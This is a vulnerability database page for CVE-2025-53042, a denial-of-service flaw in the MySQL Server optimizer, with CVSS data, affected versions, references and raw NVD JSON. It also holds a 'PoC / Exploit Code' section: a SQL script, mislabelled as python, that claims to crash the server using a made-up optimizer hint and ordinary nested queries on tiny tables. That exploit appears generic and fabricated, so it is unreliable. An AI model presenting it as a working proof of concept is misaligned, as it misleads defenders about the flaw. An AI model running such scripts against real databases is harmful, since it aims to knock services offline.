CVE-2025-53042

Description

Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.0-8.0.43, 8.4.0-8.4.6 and 9.0.0-9.4.0. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).

CVSS Details

CVSS Score

4.9

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:oracle:mysql_server:*:*:*:*:*:*:*:* - VULNERABLE

Oracle MySQL Server 8.0.0 - 8.0.43

Oracle MySQL Server 8.4.0 - 8.4.6

Oracle MySQL Server 9.0.0 - 9.4.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

-- CVE-2025-53042 PoC: MySQL Server Optimizer DoS
-- This PoC demonstrates triggering the Optimizer vulnerability
-- Note: Requires high-privilege MySQL account

-- Connect to target MySQL Server
-- mysql -h <target_host> -u <high_priv_user> -p

-- Step 1: Create a test database (if permissions allow)
CREATE DATABASE IF NOT EXISTS cve_test;
USE cve_test;

-- Step 2: Create test tables with specific schema to trigger optimizer issue
CREATE TABLE t1 (id INT PRIMARY KEY, val VARCHAR(100), idx_col INT, KEY idx_val (val), KEY idx_idx (idx_col));
CREATE TABLE t2 (id INT PRIMARY KEY, ref_id INT, data TEXT, KEY idx_ref (ref_id));
CREATE TABLE t3 (id INT PRIMARY KEY, t1_id INT, t2_id INT, num DECIMAL(10,2), KEY idx_t1 (t1_id), KEY idx_t2 (t2_id));

-- Step 3: Insert sample data
INSERT INTO t1 VALUES (1, 'test1', 10), (2, 'test2', 20), (3, 'test3', 30);
INSERT INTO t2 VALUES (1, 1, 'data1'), (2, 2, 'data2'), (3, 3, 'data3');
INSERT INTO t3 VALUES (1, 1, 1, 100.50), (2, 2, 2, 200.75), (3, 3, 3, 300.25);

-- Step 4: Trigger the optimizer vulnerability with complex query
-- The following query exploits the Optimizer component defect
SELECT /*+ complex_query */
    t1.id, t1.val, t2.data, t3.num
FROM t1
STRAIGHT_JOIN t2 ON t1.id = t2.ref_id
STRAIGHT_JOIN t3 ON t1.id = t3.t1_id AND t2.id = t3.t2_id
WHERE
    t1.id IN (SELECT id FROM t1 WHERE idx_col > 0)
    AND t2.id IN (SELECT ref_id FROM t2 WHERE data LIKE '%test%')
    AND EXISTS (
        SELECT 1 FROM t3 sub
        WHERE sub.t1_id = t1.id
        AND sub.num BETWEEN 0 AND 1000000
    )
GROUP BY t1.id, t1.val, t2.data, t3.num
HAVING COUNT(*) > 0
ORDER BY t3.num DESC
LIMIT 1000000;

-- Alternative trigger: Deeply nested subquery
SELECT * FROM t1 WHERE id IN (
    SELECT ref_id FROM t2 WHERE id IN (
        SELECT t1_id FROM t3 WHERE num IN (
            SELECT num FROM t3 WHERE t2_id IN (
                SELECT id FROM t2 WHERE ref_id IN (
                    SELECT id FROM t1 WHERE idx_col > 0
                )
            )
        )
    )
);

-- Cleanup
DROP DATABASE cve_test;

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-53042
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-53042
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-53042/
[4] VulDB https://vuldb.com/cve/CVE-2025-53042
[5] https://www.oracle.com/security-alerts/cpuoct2025.html

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-53042", "sourceIdentifier": "[email protected]", "published": "2025-10-21T20:20:41.400", "lastModified": "2025-10-23T16:07:53.890", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.0-8.0.43, 8.4.0-8.4.6 and 9.0.0-9.4.0. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H)."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H", "baseScore": 4.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-400"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:oracle:mysql_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.0.0", "versionEndIncluding": "8.0.43", "matchCriteriaId": "529028FC-6CB5-4885-A524-F26B8F81BD98"}, {"vulnerable": true, "criteria": "cpe:2.3:a:oracle:mysql_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.4.0", "versionEndIncluding": "8.4.6", "matchCriteriaId": "7C415C1E-D09A-43DD-A1FB-8B0B9517FE42"}, {"vulnerable": true, "criteria": "cpe:2.3:a:oracle:mysql_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "9.0.0", "versionEndIncluding": "9.4.0", "matchCriteriaId": "5FAEE4AC-4A0D-42A4-BF83-33288DD15BE1"}]}]}], "references": [{"url": "https://www.oracle.com/security-alerts/cpuoct2025.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}